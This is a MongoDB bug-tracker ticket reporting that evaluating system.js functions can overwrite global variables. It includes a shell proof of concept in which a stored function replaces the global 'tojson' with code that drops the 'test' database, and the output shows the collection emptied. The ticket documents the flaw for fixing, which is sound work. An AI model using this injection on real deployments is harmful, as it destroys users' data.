Core Server / SERVER-90133

Evaluation of system.js functions can modify global scope

    • Type: Bug
    • Resolution: Unresolved
    • Priority: Major - P3
    • Affects Version/s: None
    • Component/s: None
    • Labels: None
    • Query Execution
    • ALL
    • QE 2024-07-22

      Evaluation of JavaScript statements to produce functions from system.js can still have side effects. The Mongo object isn't loaded at the time they are executed, but they can still poison global variables.

      MongoDB Enterprise > db.col.insert({data: 5})
      WriteResult({ "nInserted" : 1 })
      MongoDB Enterprise > db.system.js.save({_id: "foo", value: Code("function() {this.tojson = function() {(new this.Mongo).getDB(\"test\").dropDatabase()}}(), function(){return function() {return 5;}}()")})
      WriteResult({ "nMatched" : 0, "nUpserted" : 1, "nModified" : 0, "_id" : "foo" })
      MongoDB Enterprise > db.eval("foo")
      WARNING: db.eval is deprecated
      { "code" : "function () {return 5;}" }
      MongoDB Enterprise > db.eval("tojson")
      WARNING: db.eval is deprecated
      { "code" : "function () {(new this.Mongo).getDB(\"test\").dropDatabase()}" }
      MongoDB Enterprise > db.eval("tojson(5)")
      WARNING: db.eval is deprecated
      null
      MongoDB Enterprise > db.col.count()
      0

      See the original ticket SECURITY-470 for additional context and history.

            Assignee: Justin Seyster (justin.seyster@mongodb.com)
            Reporter: Spencer Jackson (spencer.jackson@mongodb.com)
            Votes: 0
            Watchers: 11